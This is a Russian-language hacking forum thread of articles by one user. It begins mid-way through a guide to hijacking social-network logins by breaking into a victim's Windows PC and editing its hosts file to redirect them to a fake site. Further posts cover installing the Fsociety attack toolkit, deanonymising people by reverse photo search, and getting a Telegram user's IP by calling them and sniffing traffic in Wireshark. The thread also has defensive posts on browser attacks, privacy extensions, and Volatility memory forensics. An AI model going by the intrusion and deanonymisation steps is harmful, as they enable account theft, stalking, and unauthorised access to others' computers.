Второй этап — получение доступа к целевой системе путем взлома Windows.

b2f17be5838b1a1499e9ac1156a0acd8.jpg


Итак, существует множество способов взломать Windows. Вы можете использовать вредоносные ссылки, PDF-файлы, файлы Word и многое другое для взлома Windows.

Вот гайды, в которых мы описываем взлом Windows:

Взлом Windows: как хакеры обходят систему безопасности
Взлом ОС Windows с помощью Adobe PDF
Как обойти пароль на Windows - 4 способа
Теперь, когда вы взломали Windows, можно переходить к 3 и главному этапу.

Третий этап — редактирование файла hosts в Windows.

Во-первых, вам нужно узнать, где находится файл hosts. Чтобы открыть файл hosts, перейдите в папку: C:\Windows\System32\drivers\etc.

Итак, вот ваш файл хостов, как показано на изображении ниже:

727f058b592189eff77f868f7bb5e97e.jpg


hosts file location

C:\WINDOWS\system32\drivers\etc\hosts

После указаний по установке и предупреждений на странице вы найдете эту запись:

127.0.0.1 localhost

Ниже нее заполните строку в следующем формате:

[IP-АДРЕС] [ДОМЕННОЕ ИМЯ]

192.168.xx www.названиесайта.com

Где www.названиесайта.com — имя сайта, который вы хотите взломать.

IP-адрес — ссылка, на которую вы хотите перенаправить жертву.

Вот, что у нас получилось:

3091b2ea8756938271b2513ca5864866.jpg


Заключение
Таким образом, вы научились взламывать социальные сети с помощью файла hosts. Исходя из всего вышенаписанного, важно отметить, что, если у вас изначально есть доступ к системе Windows, то взломать ее будет проще. Вы можете сразу пропустить шаг 2, и просто зайти и отредактировать файл hosts. Однако, шаг 1 все равно необходим для взлома социальных сетей. Надеемся, вам понравился такой необычный способ взлома. На этом все. Удачи!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Fsociety: взлом — это просто

Fsociety: взлом — это просто


IjXeMTa.jpeg



Вступить в наш чат​
Ни для кого не секрет, что интерес к хакерским инструментам с каждым годом растет. Вся эта революция, связанная с компьютерной безопасностью, киберпреступностью, этическим взломом, привела к созданию новых дистрибутивов, одним из которых является Fsociety, поучивший известность после выхода сериала Mr Robot.


Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Что такое Fsociety
Это пакет инструментов для многоплатформенного взлома с открытым исходным кодом, который объединяет ряд команд и приложений, связанных с компьютерной безопасностью и взломом. Fsociety – это, по сути, среда тестирования на проникновение, которая включает в себя все инструменты взлома, которые нужны хакеру, начиная от сбора информации, заканчивая сниффингом и спуфингом.

Как установить Fsociety на Linux
Инструмент может быть установлен в Linux и Windows. Установка этого пакета хакерских инструментов предельно проста. Для этого вам нужно выполнить следующие шаги:

Шаг 1. Для установки на Kali, откройте терминал и введите следующую команду:

git clone https://github.com/Manisso/fsociety.git
Шаг 2. Подождите, пока фреймворк будет загружен. Перейдите в папку fsociety. Введите следующую команду, чтобы изменить разрешения и сделать файл исполняемым:

cd fsociety
****d +x install.sh
Шаг 3. Теперь запустите его, выполнив следующую команду в терминале:

./install.sh
fsociety
Как установить Fsociety на Windows
Для установки на Windows вам потребуется лишь скачать файлы с Git репозитория и убедиться в наличии Cygwin и Python 2.7 (и выше).

Запуск осуществляется одной командой:

python fsociety.py
Функции Fsociety
Далее вы увидите функции Fsociety.

fwTMFmM.png



Сбор информации
Первым этапом взлома является сбор как можно большего количества информации о цели. С помощью платформы Fsociety вы можете использовать следующие инструменты для сбора информации.


Атаки на пароли
Что касается взлома пароля, платформа содержит два основных инструмента — Cupp и BruteX, которые могут выполнять автоматические атаки методом перебора.


Беспроводное тестирование
Платформа содержит три инструмента для взлома сети Wi-Fi:

Первый из них — reaver, который осуществляет брутфорс атаку на PIN-коды защищенной настройки Wi-Fi (WPS).

Pixiewps — это инструмент, позволяющий пользователям перебирать PIN-код WPS сетей Wi-Fi в автономном режиме. Благодаря этому вы можете легко взломать множество сетей Wi-Fi.

Последний инструмент — это Bluetooth Honeypot GUI Framework, который позволяет отслеживать атаки с помощью графического интерфейса пользователя.


Сниффинг и спуфинг
В этой платформе доступно множество инструментов для сниффинга и спуфинга.

Например, SEToolkit доступен в Kali Linux по умолчанию. Он очень хорошо интегрируется для проведения атак социальной инженерии.

SSLtrip может использоваться при атаке «Человек посередине», когда вы хотите обойти безопасность https. Несмотря на то, что он работает только в старых браузерах, он все равно выполняет свою функцию довольно хорошо.


Веб-хакинг

SREMBbv.jpeg

Раздел веб-хакинга является самым популярным, поскольку для взлома веб-сайтов доступно множество инструментов, и большинство из них автоматизированы. Вы можете использовать их все в соответствии с вашими требованиями. Многие из них созданы для платформ CMS, таких как WordPress, Joomla и Drupal.


Пост-эксплуатация
В этом разделе мы можем найти инструменты, которые можно использовать после завершения эксплуатации цели. Отсюда и название. В основном они используются для сбора данных или для получения root-доступа.
fS7I9Xz.jpeg



Заключение
Таким образом, сегодня вы узнали про фреймворк, который включает в себя почти все, если не все, хакерские скрипты и программы. Более того, он ещё и устанавливается не только на Linux, но и на Windows. Мы надеемся, что это руководство было для вас информативным и полезным. Благодарим вас за его прочтение.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Взлом через браузер — виды, примеры и способы защиты

Взлом через браузер — виды, примеры и способы защиты

ec9adf9232c722424597f4fd5a95e1d3.jpg


Браузеры уже давно стали обыденностью для каждого пользователя, предоставляя доступ к многообразному контенту. Однако за это удобство приходится платить безопасностью. 95% вредоносных программ, которые нельзя обнаружить системами, распространяются через просмотр веб-страниц. Итак, как же защитить себя от возможных атак?

d1ecf9c152936ac63d29c781ecb2a37e.jpg


Что такое взлом через браузер
Взлом через браузер возможен при наличие уязвимостей в веб-приложениях. Хакеры используют слабые места в коде, дизайне или функциональности веб-приложений для компрометации пользовательских данных, кражи конфиденциальной информации или выполнения вредоносного кода.

Вот несколько причин, из-за которых происходят атаки браузера:

Технические уязвимости. Уязвимости в браузерах, плагинах и веб-приложениях, плохое кодирование предоставляют злоумышленникам точки входа.
Эксплуатация безопасности. Злоумышленники извлекают выгоду из таких слабых мест, как XSS, CSRF для компрометации систем.
Неосведомленность пользователей. Недостаточная осведомленность об угрозах и методах безопасности делает пользователей доступной добычей.
Пренебрежение обновлениями. Отсутствие обновлений браузеров, плагинов и систем оставляет уязвимости в системе и делает ее легкой мишенью для злоумышленников.
Сторонние риски. Зависимости от внешних скриптов и сервисов создают дополнительные векторы атак.
10 атак с использованием веб-браузера
1. Межсайтовый скриптинг (XSS)

XSS возникает, когда злоумышленник внедряет вредоносные сценарии, обычно JavaScript, в веб-страницы, просматриваемые другими пользователями. Эти сценарии выполняются в контексте браузера жертвы, позволяя злоумышленнику украсть файлы cookie, токены сеанса или другую конфиденциальную информацию.

Пример: Злоумышленник может оставить комментарий на сайте, содержащий вредоносный скрипт, который при просмотре крадет файлы cookie сеанса пользователей. Когда браузеры этих пользователей отправляют файлы cookie на сервер, злоумышленник перехватывает их, получая несанкционированный доступ к их учетным записям.
2. Подделка межсайтового запроса (CSRF)

CSRF — это вид атаки на сайт, при которой злоумышленник с помощью мошеннического сайта или скрипта заставляет браузер пользователя выполнять на доверенном сайте действия от его имени: отправлять сообщения, менять пароли, переводить деньги со счета на счет и пр. В атаке используются недостатки протокола HTTP.

Пример: Злоумышленник отправляет жертве email, содержащий ссылку на вредоносный сайт. При посещении сайта браузер жертвы выполняет скрытый запрос к настоящему сайту, на котором жертва уже авторизована (например, банку). Этот запрос переводит средства со счета жертвы на счет злоумышленника без ведома жертвы.
3. Фишинг

Фишинг — вид интернет-мошенничества, целью которого является получение идентификационных данных пользователей (логин, пароль, номер кредитной карты и другой конфиденциальной информации), а также запуск вредоносного программного обеспечения на компьютере пользователя.

Пример: злоумышленник отправляет электронное письмо под видом письма от банка и просит получателя обновить данные своей учетной записи, перейдя по ссылке. Ничего не подозревающая жертва, вводит свои учетные данные на поддельной странице, а злоумышленник получает к ним доступ.

4. Попутные загрузки

Атаки с попутной загрузкой используют уязвимости в браузере или плагинах пользователя для загрузки и выполнения вредоносного кода в его системе без его ведома. Этот код может выполнять различные вредоносные действия, такие как кража данных или установка дополнительных программ.

Пример: Пользователь посещает взломанный веб-сайт, содержащий скрытый вредоносный код. Этот код использует уязвимость в браузере пользователя для незаметной загрузки и запуска вредоносного ПО, заражая систему пользователя.
5. Атаки «человек посередине» (MitM)

Атаки MitM перехватывают связь между браузером пользователя и веб-сайтом, позволяя злоумышленникам подслушивать или изменять передаваемые данные. Это может привести к краже данных, перехвату сеанса или внедрению вредоносного контента.

Пример: Злоумышленник, находящийся между пользователем и общедоступной точкой доступа Wi-Fi, перехватывает HTTP-запросы пользователя. Злоумышленник может просматривать и изменять данные, передаваемые между браузером пользователя и веб-сайтами, например, такие как учетные данные для входа.
6. Кликджекинг

Кликджекинг, также известный как атака с исправлением пользовательского интерфейса (UI), представляет собой вредоносный метод, используемый для того, чтобы обманом заставить пользователей нажимать на невидимые элементы веб-страницы без их согласия.

Пример: Злоумышленник накладывает невидимый iframe поверх настоящей веб-страницы, содержащий кнопку «Мне нравится» в социальных сетях. Когда жертва заходит на сайт и пытается щелкнуть видимый контент, она неосознанно взаимодействует со скрытым iframe.
7. Взлом браузера

Взлом браузера происходит, когда вредоносное ПО получает контроль над браузером пользователя, часто с помощью вредоносных расширений браузера, панелей инструментов или плагинов. Захваченный браузер может перенаправлять пользователей на вредоносные веб-сайты, изменять их домашнюю страницу или настройки поисковой системы, а также внедрять нежелательную рекламу.

Пример: Пользователь случайно устанавливает расширение браузера, которое обещает избавить от рекламы, но на самом деле является вредоносным. После установки расширение изменяет настройки браузера, перенаправляя поисковые запросы пользователя на поддельную поисковую систему, которая собирает данные о просмотрах для злоумышленника.
8. Перехват сеанса

Перехват сеанса включает в себя кражу токена сеанса или файлов cookie пользователя, чтобы выдать себя за него и получить несанкционированный доступ к его учетным записям. Злоумышленники перехватывают или получают эти токены с помощью различных способов, таких как перехват сети или использование уязвимостей в веб-приложениях.

Пример: Злоумышленник в той же незащищенной сети Wi-Fi, что и жертва, перехватывает незашифрованный HTTP-трафик. Перехватив файлы cookie сеанса жертвы, злоумышленник может затем использовать эти файлы cookie для аутентификации себя в качестве жертвы и получения доступа к ее учетным записям без необходимости использования ее логина и пароля для входа.
9. Табнаббинг

Табнаббинг — это тип фишинговой атаки, нацеленной на пользователей, у которых открыто несколько вкладок браузера. Когда пользователь переключается на другую вкладку, а затем возвращается на неактивную вкладку, содержимое вкладки заменяется вредоносной страницей, имитирующей подлинный сайт, что предлагает пользователю повторно ввести конфиденциальную информацию.

Пример: У пользователя открыто несколько вкладок, в том числе одна, в которой выполнен вход в учетную запись онлайн банка. Переключившись на другую вкладку и вернувшись во вкладку банка, пользователь не замечает, что страница была заменена на фишинговую. Полагая, что он вышел из системы, пользователь повторно вводит свои учетные данные, которые затем перехватываются злоумышленником.
10. Формджекинг

Формджекинг — это кража данных из форм. То есть киберпреступник берет информацию с формы, которую вы заполнили на каком-то сайте. Во многих случаях злоумышленники взламывают страницу оформления заказа на сайтах электронной коммерции, чтобы украсть финансовую информацию и номера кредитных карт.

Пример: Злоумышленник взломал страницу оформления заказа в интернет-магазине, внедрив вредоносный код JavaScript. Когда пользователь вводит данные своей кредитной карты для совершения покупки, код автоматически захватывает данные и отправляет их на сервер хакера, позволяя ему заполучить данные платежной карты пользователя в мошеннических целях.

48fbf2e88a7f37f28214688efdf49364.jpg


Как защититься от атак через браузер
Ниже приведены советы, с помощью которых вы можете защитить себя от атак через браузер:

Обновления браузера, плагинов и расширений. Регулярно обновляйте свой веб-браузер до последней версии, поскольку обновления часто включают исправления безопасности всех имеющихся уязвимостей. Убедитесь, что плагины/расширения браузера, такие как Adobe Flash, Java, тоже обновлены. Удалите ненужные или устаревшие плагины/расширения.
Используйте безопасный браузер. У Google есть привычка отслеживать все, что вы делаете, чтобы затем показывать вам персонализированную рекламу. И какой бы полезной ни была поисковая система Google, существует множество способов скомпрометировать вашу личность. Таким образом, чтобы получить максимальную пользу от поисковых систем, не ставя под угрозу свою личность используйте такие службы, как StartPage, DuckDuckGo или TOR. Они не сохраняют IP-адреса, файлы cookie или историю ваших поисков. Все хакеры используют анонимные поисковые системы, чтобы оставаться незамеченными.
Включите автоматические обновления. По возможности включите автоматические обновления для вашего браузера, плагинов и расширений. Это гарантирует, что вы получите исправления безопасности, как только они станут доступны.
Используйте антивирусное обеспечение безопасности. Установите на свое устройство надежное антивирусное программное обеспечение. Эти программы могут обнаруживать и удалять вредоносное программное обеспечение, в том числе и в браузере.
Уменьшите риски атаки с помощью изоляции браузера. Изоляция браузера— решение для обеспечения безопасности, которое позволяет изолировать просмотр веб-страниц в изолированной среде, такой как виртуальная машина, «песочница» или «облако», ограждая ваше устройство от рисков, присущих просмотру веб-страниц. Таким образом, если пользователь нажимает на вредоносное вложение, вредоносное ПО остается в изолированной среде и не доходит до системы.
Оценка уязвимостей. Обнаружение рисков является еще одним ключевым элементом безопасности браузера. Сюда входят такие действия, как сканирование вредоносных программ, обнаружение фишинга и распознавание подозрительной активности для выявления потенциальных угроз и уязвимостей. Используйте инструменты автоматического сканирования для обнаружения распространенных уязвимостей, таких как XSS, SQL-инъекция, CSRF и небезопасные параметры конфигурации.
Включите функцию Click-to-Play для плагинов. Настройте свой браузер так, чтобы он запрашивал разрешение перед запуском плагинов, таких как Adobe Flash или Java. Это снижает риск атак с попутной загрузкой, предотвращая автоматическое выполнение вредоносного контента.
Будьте осторожны при переходе по ссылкам. Будьте осторожны, нажимая на ссылки в электронных письмах, публикациях в социальных сетях или на веб-сайтах, особенно если они кажутся подозрительными или получены из неизвестного источника. Наведите указатель мыши на ссылку, чтобы просмотреть URL-адрес, прежде чем нажимать на нее.
Не загружайте файлы из ненадежных источников и не нажимайте на всплывающие окна с рекламой, так как это может привести к попутным загрузкам или заражению другими вредоносными программами.
Используйте HTTPS везде. Отдавайте предпочтение веб-сайтам, использующим шифрование HTTPS (безопасный протокол передачи гипертекста) для безопасного общения. HTTPS шифрует данные, передаваемые между вашим браузером и веб-сайтом, защищая их от перехвата и вмешательства злоумышленников.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
OSINT: обратный поиск по фото

OSINT: обратный поиск по фото​
3Irzz8o.jpeg


В Интернете ТАК много данных, что можно найти практически все, если знать, как и где искать. Деанон пользователя по фото - это давно уже миф, а реальность. Даже одна фотография может выдать кучу информации: начиная от метаданных и заканчивая координатами, которые можно определить по виднеющейся улице на заднем плане. В этой статье мы поговорим о том, как искать по фото.

qd1Lx5P.png

Обратный поиск по фото может быть чрезвычайно полезен в OSINT расследованиях. Но для начала разберемся как устроен поиск по фотографиям, чтобы лучше понять его суть.
hyNvCgH.jpeg

Метаданные, они же EXIF
Любая фотография формата JPEG содержит в себе метаданные. Они включают дату, название модели камеры или смартфона, а еще редактирование, если оно имело место быть. Но и самое интересное, что иногда метаданные могут показать геолокацию фотографии.

Именно с EXIF следует начинать поиск. Несмотря на то что любое устройство может отобразить эту информацию, возможности просмотра будут ограничены. Поэтому на помощь приходят специальные программы для расширенного просмотра.

Приложение ExifTool является одной из таких, оно может прочесть огромный перечень данных с фото. И то не только EXIF, а еще и GPS, XMP, IPTC, JFIF, GeoTIFF, ICC Profile, Photoshop IRB и другие. Приложение бесплатное и поддерживает как Windows, так и MacOS.
wDntZJb.png

ExifTool
Jeffrey's Image Metadata Viewer - сайт для определения EXIF, аналог ExifTool, разница лишь в том, что не требует установки на ПК.
Stolencamerafinder.com — определит метаданные и найдет какие еще фото были сделаны с помощью этого устройства.
Помимо этого, есть еще несколько сервисов для работы с этими данными:

Если на фотографии определилась геолокация, то сайт pic2map покажет на карте конкретное место, где было сделано фото.
С помощью сервиса https://29a.ch/photo-forensics можно определить, подверглась ли фотография монтажу.
SunCalc - уникальный сервис, который с высокой точностью может определить место, где была сделана фотография всего лишь по солнцу. Для этого нужно ввести точно время, когда была сделана фотография.
Основной проблемой метаданных является то, что они зачастую стираются любыми редакторами, не давая возможность разгласить информацию о человеке. А учитывая то, что редакторами пользуются практически все, то шанса их прочесть практически нет. Ко всему прочему EXIF очень просто стереть или изменить самостоятельно с помощью exifpurge.com, поэтому нельзя полностью полагаться на данный метод поиска.

Социальные сети Instagram, Facebook, Twitter, ВК - стирают метаданные, а вот Google+, Google Photo, Flickr, Tumblr - нет.

Поиск по фото
Большинство людей знакомы с возможностями поиска по изображениям Google и Яндекс, но полученные результаты часто разочаровывают, так что давайте посмотрим и на другие, более надежные способы поиска по фото.

1. Обратный поиск изображений Google
Давайте начнем с того, с чего начинает большинство людей: с поиска Google.

Для примера мы возьмем изображение, которое легко идентифицировать. Фото Джеймса Франко из «Баллады о Бастере Скраггсе», фильма Netflix 2019 года. Франко — известный голливудский актер, и это изображение из популярного фильма, так что распознать кадр должно быть легко.
y6xvyXq.jpeg


Когда мы загрузили его в поиск изображений Google, мы получили неутешительные результаты. Google привел нас на пару сайтов, которые использовали это изображение для создания мема. Более того, он не распознал человека или фильм.

2. Обратный поиск изображений Яндекс
Когда мы загрузили наше изображение в Яндекс, мы получили следующие результаты.
hFqaRzk.jpeg


В целом результат не сильно лучше предыдущего, но зато нашлось больше похожих изображения, чем у Google.

3. Обратный поиск изображений Tin Eye
Tin Eye — еще одна хорошо известная поисковая система по изображениям. В их базе есть 40 миллиардов изображений из Интернета. Когда мы прогнали то же изображение в Tin Eye, мы получили следующие результаты.

7ytS4eK.jpeg

Tin Eye нашел 381 экземпляров этого изображения и предоставил нам ссылки и даты первого появления этого изображения.

4. Обратный поиск изображений Bing
Bing — поисковая система, разработанная и принадлежащая Microsoft. Она часто становится объектом насмешек. Давайте посмотрим, как она справится с поиском по фото. Мы получили следующие результаты:


Обратите внимание, что Bing не только нашел совпадения с этим изображением, но и идентифицировал человека как Джеймса Франко. Бинго!

Когда мы щелкнули вкладку вверху «Выглядит как», Bing отобразил биографию Джеймса Франко.


Когда мы щелкнули вкладку «Похожие изображения», Bing отобразил множество изображений Франко в одном фильме.

Другие источники для обратного поиска изображений
Baidu
FindFace
Image Identity
Berify
Image Raider
Facial Recognition
Не все поисковые системы одинаковы справились с заданием. В этом случае Bing значительно превзошёл своих конкурентов Google, Tin Eye и Яндекс. Google особенно разочаровал, и в целом мы не рекомендуем его для обратного поиска.

Заключение
Существует большое количество способов пробить человека по фотографии и не только. Это всего лишь верхушка айсберга. Не стоит недооценивать поисковики, их кэш содержит необъятное количество изображений, в том числе и из социальных сетей. Надеемся, что это статья оказалась полезной для вас. Успешного поиска!
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Анонимность браузера с помощью Privacy Possum

8bc4295f9dc967609171c88f520303b2.jpg



Вступить в наш чат
Отслеживание пользователей в Интернете уже давно в порядке вещей. И прямо сейчас за вашими действиями могут наблюдать. Однако, не все так плачевно, если знать, как «уйти в тень». Сегодня мы вам расскажем, как защититься от слежки с помощью расширения Privacy Possum.

4ce3c21156cd4e67118488d21e50a89d.jpg


Конечно, ничто не мешает вам загрузить Tor Browser, который, к слову, и сам основан на Firefox. Но если вы уже привыкли к Firefox, то на помощь придет созданное независимыми разработчиками расширение. С его помощью можно блокировать трекинг со стороны интернет-ресурсов, менять данные геолокации, модифицировать «отпечаток» браузера, а также делать множество других крутых и полезных вещей.

Читать по теме: Расширения для анонимности Firefox
Защита от отслеживания с Privacy Possum
Privacy Possum — расширение с открытым исходным кодом для браузеров Chrome и Firefox. Privacy Possum предотвращает прием файлов cookies, блокирует HTTP-заголовки set-cookie и referrer, а также искажает «отпечаток» браузера, что затрудняет фингерпринтинг.

228b4c08a9a1bb5cf85e8dfabf76e5a9.png


Как и большинство расширений для конфиденциальности, он добавляет значок на главную панель инструментов, которая действует как индикатор активности блокировки. Продвинутых настроек у плагина нет: его можно включить или выключить, а на страничке конфигурации — запретить автоматическое обновление и разрешить ему запускаться в приватном окне.

e8a82760de7c8f0c727eaa06d8821a1b.png


Текущая версия расширения блокирует четыре разных способа слежки:

Блокировка заголовков референта, которые могут отображать местоположение просмотра;
Блокировка заголовков etag для отслеживания кеширования браузера. Privacy Possum strip и хранит данные заголовка etag и сравнивает его с сторонними запросами к URL-адресу, чтобы определить, используется ли заголовок для отслеживания или нет;
Блокировка всех сторонних файлов cookie, которые используются для отслеживания пользователей;
Блокировка некоторых браузеров. Если сайт смешивает код фингерпринтинга первой стороны с кодом, необходимым для запуска сайта, Privacy Possum не будет блокировать, а будет разбавлять данные, введя случайные данные, чтобы изменить фингерпринт.
Privacy Possum запускается автоматически. Расширение указывает на активность блокировки, добавляя номер к его значку. Появится щелчок по значку.

Интерфейс имеет переключатель включения-выключения, который можно использовать для деактивации расширения. Privacy Possum поддерживает функцию белого списка. В нем перечислены заблокированные элементы, например, заголовки отслеживания или файлы JavaScript, которые загружаются в интерфейс; просто нажмите на флажок перед заблокированным элементом, чтобы отключить блокировку для этого конкретного сайта.

Скачать Privacy Possum
Скачать расширение можно с маркетов Firefox, Google и с официальной страницы на Гитхаб.

Заключение
Privacy Possum — многообещающее расширение браузера для Chrome и Firefox, которое улучшает вашу конфиденциальность в Интернете. Оно предлагает много защитных функций, и, безусловно, поможет сохранить вашу анонимность.

 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Volatility. Анализ вредоносного ПО

dec7efbb256222b57d17d1f2efe04e09.jpg


Вступить в наш чат
В этой статье мы поговорим об инструменте Volatility и о том, как проводить анализ вредоносного ПО, используя этот инструмент. Мы обсудим различные возможности инструмента и его команды.

a2d8e066ed4b0b8115d2f69ec63043a6.png


Что такое анализ вредоносных программ?
Анализ вредоносных программ — это процесс, который исследует функционирование, цели и потенциальное воздействие вредоносного программного обеспечения (вредоносных программ). Этот тип анализа имеет первостепенное значение в мире кибербезопасности, поскольку вредоносное ПО становится все более сложным и всепроникающим.

Анализ файлов можно разделить на два вида:

Статический, при котором файл исследуется без его исполнения;
Динамический, когда инициируется запуск файла в безопасной среде (тестовая железка или виртуальная машина).
Стоит отметить, что соблюдения перечисленных правил полностью не обезопасят вас от заражения компьютера или потери данных, связанных с неосторожной работой с вредоносными файлами. Но значительно повысят надёжность вашего рабочего окружения.

Итак, что нас подстерегает при анализе вредоносного ПО:

Случайный запуск исполняемого файла.
Эксплуатация уязвимости в анализируемом ПО.
Блокировка антивирусом работы утилиты или удаление самого анализируемого файла.
Что такое Volatility
Volatility — инструмент криминалистической экспертизы памяти с открытым исходным кодом для анализа оперативной памяти, который часто используется при анализе вредоносного ПО для извлечения информации из дампов памяти. Инструмент позволяет изучать память работающей или спящей системы и выполнять различные методики анализа для выявления и понимания вредоносной активности.

Однако, если вы используете Kali Linux, он устанавливается по умолчанию.

В системах на основе Debian просто установите его с помощью следующей команды:

sudo apt-get install volatility
Преимущества Volatility:

Написан на Python: многим аналитикам памяти удобно работать со скриптами Python.
Кроссплатформенный: Volatility может работать на любой платформе, поддерживающей Python, что означает, что вам не нужно тратить время на загрузку или установку.
Имеет открытый исходный код.
Бесплатный.
Позволяет создавать скрипты: вы можете автоматизировать задачи с помощью Volatility, так как он легко позволяет использовать скрипты.
Команды в Volatility
Вот основные команды в Volatility, которые часто используются при анализе вредоносного ПО:

imageinfo — отображает основную информацию о дампе памяти, такую как профиль, версию операционной системы и уровень обновления.

volatility -f <дамп_памяти> imageinfo
pslist — команда выводит список всех запущенных процессов в дампе памяти.

volatility -f <дамп_памяти> --profile=<имя_профиля> pslist
psscan — сканирует процессы в памяти и может быть полезной для обнаружения скрытых или завершенных процессов.

volatility -f <дамп_памяти> --profile=<имя_профиля> psscan
pstree — команда отображает дерево процессов, показывая связи между родительскими и дочерними процессами.

volatility -f <дамп_памяти> --profile=<имя_профиля> pstree
dlllist — выводит список всех загруженных DLL-библиотек для каждого процесса.

volatility -f <дамп_памяти> --profile=<имя_профиля> dlllist -p <идентификатор_процесса>
handles — отображает все открытые дескрипторы (handles) в дампе памяти.

volatility -f <дамп_памяти> --profile=<имя_профиля> handles
cmdscan — сканирует историю командной строки в дампе памяти.

volatility -f <дамп_памяти> --profile=<имя_профиля> cmdscan
getsids — выводит список всех идентификаторов безопасности (SIDs) в дампе памяти.

volatility -f <дамп_памяти> --profile=<имя_профиля> getsids
apihooks — идентифицирует процессы, в которых установлены зацепления API.

volatility -f <дамп_памяти> --profile=<имя_профиля> apihooks
malfind — сканирует внедренный код или потенциально вредоносный код в работающих процессах.

volatility -f <дамп_памяти> --profile=<имя_профиля> malfind
malsysproc — идентифицирует потенциально вредоносные процессы на основе эвристик.

volatility -f <дамп_памяти> --profile=<имя_профиля> malsysproc
malfind, malprocfind и malfind2 — эти команды можно использовать вместе для сканирования внедренного кода или вредоносных процессов.

volatility -f <дамп_памяти> --profile=<имя_профиля> malfind
volatility -f <дамп_памяти> --profile=<имя_профиля> malprocfind
volatility -f <дамп_памяти> --profile=<имя_профиля> malfind2
Не забудьте заменить <дамп_памяти> путем к вашему файлу дампа памяти и <имя_профиля> на соответствующий профиль для операционной системы и архитектуры дампа памяти.

Это только базовый набор команд; Volatility предоставляет множество дополнительных плагинов и функций для расширенного анализа памяти.

Заключение
Анализ вредоносных программ помогает улучшить свою защиту от киберугроз. Процесс анализа позволяет понять методы распространения, цели и векторы атак вредоносных программ. Volatility является важным набором инструментов для анализа вредоносного ПО, так как информация, полученная с помощью этого инструмента, может быть использована для оптимизации мер безопасности.​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как определить IP-адрес пользователя Telegram

0aed949c065502d8846258d1e0e10763.jpg


https://t.me/BlackMASTChat

Сегодня мы расскажем вам про простой способ деанона, а именно как узнать IP-адрес пользователя Telegram.

Как определить IP-адрес в Telegram
Чтобы определить IP-адрес в Telegram, выполните следующие шаги:

Скачивание и установка сниффера Wireshark.
Выбор соответствующего интерфейса.
Звонок целевому пользователю.
Настройка параметров поиска Wireshark.
Поиск протокола TCP и определение IP-адреса.
А теперь рассмотрим каждый этап подробнее.

Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Шаг 1: Скачивание Wireshark
Прежде всего, необходимо скачать и установить Wireshark, мощный инструмент для перехвата и анализа сетевых протоколов. Загрузить его можно с официального сайта Wireshark.

e5b2b72f6be6abc2d954c1ae45707f75.png




Скачивание Wireshark для пробива IP адреса Телеграм
После установки откройте Wireshark, и можно приступать к работе.

75f1e96bf680521284a9a1eb23e0a3fa.png


Скачивание Wireshark для пробива IP адреса Телеграм
Шаг 2: Выбор соответствующего интерфейса
Запустите Wireshark и выберите сетевой интерфейс, который вы хотите мониторить. Это соединение будет использоваться для совершения звонка.

cb07120cb3541cfd410fde01df0e07af.png


Выбор интерфейса для определения IP адрес
Шаг 3: Звонок к пользователю
Используя учетную запись, инициируйте звонок целевому пользователю через Telegram.

Шаг 4: Настройка параметров поиска Wireshark
В Wireshark настройте фильтр для перехвата нужных данных. В частности, необходимо выполнить поиск по строке XDR-MAPPED-ADDRESS.

3c9e24beb812980d72b15d5f90c26f0e.png


Настройка параметров поиска Wireshark

f5e90b4c48e67b26416179b729f752b0.png


Настройка параметров поиска Wireshark
Шаг 5: Поиск протокола TCP
Найдите пакеты данных с протоколом TCP, в которых IP-адрес назначения является публичным IP-адресом. Это и есть искомый IP-адрес.

82289218eb4a7e7476d65f112ba18616.png


Узнать IP адрес Telegram пользователя
Когда вы обнаружите в перехваченных данных публичный IP-адрес, вы успешно определите IP-адрес целевого пользователя.



c09662d5148de46e74257729eaf35d73.png


Узнать IP адрес Телеграм пользователя
Как избежать определения IP-адреса в Telegram
Чтобы избежать утечки своего IP-адреса, необходимо зайти в Настройки Telegram —> Конфиденциальность и безопасность —> Звонки, а затем выбрать Не использовать в меню Peer-to-Peer, как показано ниже.

491c0b8ecf9f49b66e67b4976055ac04.png
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Tox - анонимный мессенджер

UCeSlRs.jpeg


https://t.me/BlackMASTChat

Нужна безопасная и анонимная замена Skype? Тогда вы попали в нужное место. В извечном стремлении хранить тайну переписки нам поможет мессенджер Tox. Сегодня мы расскажем, как установить и пользоваться этим мессенджером.

rhXomB6.png


Как работает Tox?
Tox — это новый вид мгновенных сообщений, созданный в ответ на широкое распространение цифрового слежения со стороны корпораций и правительств. Он может похвастаться двумя технологиями: шифрованием и P2P. Это простое в использовании программное обеспечение, которое позволяет вам общаться без посторонних ушей. В отличие от других известных сервисов, которые требуют оплату за дополнительные функции, Tox абсолютно бесплатен и не содержит рекламы.

Основные функции Tox включают:

Мгновенные сообщения. Безопасное общение по всему миру;
Голосовые вызовы. Зашифрованные голосовые вызовы без каких-либо затрат;
Видеозвонки. Возможность видеть собеседника в режиме реального времени;
Поделиться экраном. Демонстрация экрана вашего компьютера;
Обмен файлами. Отправка и прием файлов без искусственных ограничений;
Групповой чат. Общение, звонки и обмен видео и файлами в групповых чатах.
Особенности Tox:

Все, что вы делаете в Tox, зашифровано. Единственные люди, которые могут видеть ваши разговоры, – это люди, с которыми вы разговариваете.
Tox – это свободное программное обеспечение. Это означает, что Tox принадлежит вам – для использования, модификации и распространения.
У Tox нет центральных серверов, которые можно было бы обыскать, закрыть или вынудить передать данные. Сеть состоит из ее пользователей. Поскольку здесь нет центрального сервера, пользователи могут просто включить свои клиенты и добавлять друзей без регистрации и настройки на каком-либо сервисе.
На сайте проекта предлагаются клиенты для популярных настольных платформ: Linux, Windows и OS X, а также для мобильных платформ Android и iOS.
